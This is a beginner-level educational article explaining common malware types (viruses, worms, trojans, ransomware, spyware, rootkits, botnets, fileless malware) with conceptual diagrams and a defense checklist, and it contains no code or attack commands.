Malware and Its Types

Malware is short for malicious software. It is any program or code written with the purpose of causing harm — stealing data, damaging files, disrupting systems, or gaining unauthorized control over a device. Malware is the most common weapon attackers use, and it appears in many different forms.

Each type of malware has a unique way of spreading and a specific goal. A beginner must understand each type clearly to recognize warning signs and take the right defensive steps.

How Malware Enters a System

COMMON ENTRY POINTS FOR MALWARE:

Email Attachment ──────────►┐
Malicious Website ──────────┤
Infected USB Drive ─────────┤──► DEVICE INFECTED
Software Download ──────────┤
Fake Software Update ───────┘

Once inside:
Malware runs silently ──► Steals / Damages / Controls

Type 1: Virus

A computer virus is the oldest and most well-known type of malware. It attaches itself to a legitimate file — like a document or a program. When a user opens that file, the virus code runs. The virus then copies itself into other files on the same system and spreads further whenever those infected files are shared.

How a Virus Works

Step 1: Attacker embeds virus code inside "invoice.pdf"
Step 2: Victim receives and opens "invoice.pdf"
Step 3: Virus code runs automatically
Step 4: Virus copies itself into 5 other files on the device
Step 5: Victim emails one of those files to a colleague
Step 6: Colleague opens it → now their device is infected too

A virus needs a human action — opening a file — to activate and spread. This is what separates a virus from a worm.

Key Characteristics

• Requires a host file to attach to
• Needs user action to activate
• Can corrupt or delete files
• Spreads when infected files are shared

Type 2: Worm

A worm is similar to a virus but far more dangerous in terms of spread. A worm does not need to attach to a file, and it does not need a user to open anything. It copies itself and moves across a network automatically, exploiting security vulnerabilities in connected systems.

WORM SPREAD ACROSS A NETWORK:

Device A (Infected)
    │
    ├──► Device B (Auto-infected via network)
    │        │
    │        ├──► Device C
    │        └──► Device D
    │
    └──► Device E (Auto-infected via network)
             │
             └──► Device F, G, H...

No user action required. Spread is automatic and rapid.

The WannaCry worm in 2017 infected over 200,000 computers across 150 countries within hours — simply by spreading automatically through unpatched Windows systems.

Type 3: Trojan Horse

A Trojan Horse — or simply Trojan — is malware that disguises itself as a useful, legitimate application. A user willingly downloads and installs it because it looks harmless or helpful. Once installed, the Trojan carries out its real purpose in the background.

TROJAN DISGUISE EXAMPLE:

What user sees:       "Free Video Editor Pro – Download Now!"
What user downloads:  video_editor_pro.exe
                         ├── Actual software (real, works as expected)
                         └── Hidden malware (steals banking passwords)

User installs it → Software works fine → Malware runs silently in background
→ Banking credentials sent to attacker

Unlike a virus or worm, a Trojan does not replicate itself. It relies on the user installing it voluntarily under false pretenses.

Type 4: Ransomware

Ransomware encrypts all files on an infected device, making them completely unreadable. The attacker then displays a message demanding payment — usually in cryptocurrency — to provide the decryption key. If the victim does not pay, the files remain locked permanently.

RANSOMWARE ATTACK SEQUENCE:

Step 1: Victim clicks on infected email attachment
Step 2: Ransomware installs silently
Step 3: Ransomware scans and encrypts ALL files
        Documents, Photos, Databases → all locked
Step 4: Screen displays ransom note:
        "Your files are encrypted. Pay $500 in Bitcoin
         within 48 hours or all files will be deleted."
Step 5: Victim must choose: Pay or lose data

Ransomware caused over $20 billion in global damages in 2021. Hospitals, schools, government agencies, and businesses of all sizes have fallen victim. The best defense is keeping offline backups of all critical data.

Type 5: Spyware

Spyware secretly monitors everything a user does on a device and sends that information to the attacker. It tracks keystrokes, captures screenshots, records browsing history, and steals saved passwords — all without the user knowing.

A keylogger is a common type of spyware. It records every key pressed on a keyboard. If someone types a bank password, the keylogger captures it and sends it to the attacker.

Type 6: Adware

Adware automatically displays or downloads unwanted advertisements on a device. While adware is less harmful than other types, it slows down the system, creates a poor user experience, and sometimes acts as a gateway for more dangerous malware. Many free applications come bundled with adware hidden inside.

Type 7: Rootkit

A rootkit is one of the stealthiest types of malware. It hides deep inside the operating system — sometimes at the hardware level — and gives the attacker persistent, administrator-level control over the device. Rootkits are designed to be invisible. Standard antivirus tools often cannot detect them because the rootkit hides itself from the operating system's security tools.

ROOTKIT HIDING MECHANISM:

Operating System asks: "Are any malicious programs running?"
Rootkit intercepts the question
Rootkit answers: "No, nothing suspicious here."
Real answer: Rootkit is actively running and hiding itself

Result: Attacker has full control, device appears clean

Type 8: Botnet and Bot Malware

A botnet is a network of infected computers that an attacker controls remotely. Each infected computer is called a "bot" or "zombie." The attacker — called a bot herder — can command all bots simultaneously to carry out large-scale attacks such as DDoS attacks, spam campaigns, or cryptocurrency mining.

BOTNET STRUCTURE:

Attacker (Bot Herder)
    │
    ├──► Bot 1 (Infected PC, India)
    ├──► Bot 2 (Infected PC, USA)
    ├──► Bot 3 (Infected PC, Germany)
    ├──► Bot 4 (Infected PC, Brazil)
    └──► Bot 5 (Infected PC, Japan)

All bots receive one command: "Attack website X"
Combined traffic from all bots → DDoS attack on website X

The owner of an infected computer usually has no idea their machine is part of a botnet. The device may run slightly slower, but shows no other obvious signs.

Type 9: Fileless Malware

Fileless malware does not install any file on the target device. Instead, it runs directly in the computer's memory (RAM) using legitimate system tools that are already present on the device. Because no file is written to the hard drive, traditional antivirus scans often miss it completely.

FILELESS MALWARE VS TRADITIONAL MALWARE:

Traditional Malware:
Attacker → Installs malware.exe on hard drive → Antivirus scans → Detected

Fileless Malware:
Attacker → Injects code into RAM using built-in Windows tool (PowerShell)
         → Runs entirely in memory → Leaves no file on disk
         → Antivirus has nothing to scan → NOT detected

Malware Comparison Table

Malware Defense Checklist

• Keep software updated – Patches close the vulnerabilities malware exploits to enter.
• Use reputable antivirus software – Detects and removes known malware from the device.
• Avoid unknown email attachments – Most malware arrives through email.
• Download software only from official sources – Eliminates Trojan-laden fake software.
• Back up data regularly – The only reliable defense against ransomware is a clean backup.
• Use a firewall – Blocks malware from sending data back to an attacker over the network.
• Enable behavior-based detection – Catches fileless malware that traditional scans miss.

Understanding malware types is essential before moving on to social engineering — a completely different attack method that does not use malware at all. Instead, social engineering attacks exploit the most unpredictable target in any security system: human beings.